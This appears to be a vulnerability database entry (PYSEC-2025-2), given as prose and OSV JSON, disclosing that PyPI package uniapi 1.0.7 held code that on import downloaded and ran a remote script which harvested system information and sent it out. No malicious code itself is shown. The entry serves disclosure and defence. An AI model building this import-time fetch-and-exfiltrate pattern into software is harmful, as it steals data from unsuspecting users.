PYSEC-2025-2

Vulnerability from pysec - Published: - Updated: 2025-01-24 19:56
VLAI?
Details

uniapi version 1.0.7 introduces code that would execute on import of the module and download a script from a remote URL, and would then execute the downloaded script in a thread. The downloaded script would harvest system information and POST the information to another remote URL. This code was found in the PyPI release artifacts and was not present in the public GitHub repository.

Impacted products
Name purl
uniapi pkg:pypi/uniapi
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "uniapi",
        "purl": "pkg:pypi/uniapi"
      },
      "versions": [
        "1.0.7"
      ]
    }
  ],
  "credits": [
    {
      "name": "Mike Fiedler",
      "type": "COORDINATOR"
    },
    {
      "name": "Kamil Ma\u0144kowski",
      "type": "REPORTER"
    }
  ],
  "details": "uniapi version 1.0.7 introduces code that would execute\non import of the module and download a script from a remote URL,\nand would then execute the downloaded script in a thread.\nThe downloaded script would harvest system information\nand `POST` the information to another remote URL.\nThis code was found in the PyPI release artifacts and was not present\nin the public GitHub repository.\n",
  "id": "PYSEC-2025-2",
  "modified": "2025-01-24T19:56:53+00:00",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://inspector.pypi.io/project/uniapi/1.0.7/packages/0f/40/c6e06c22bbc22ef45f40bf5a7711763fa08fec4d16b4718d86fd60970131/uniapi-1.0.7.tar.gz/uniapi-1.0.7/uniapi/__init__.py#line.11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kam193/package-campaigns/blob/main/pypi/campaigns/highly_suspicious/2025-01-uniapi.json"
    }
  ],
  "summary": "uniapi version 1.0.7 contained an information harvesting script."
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.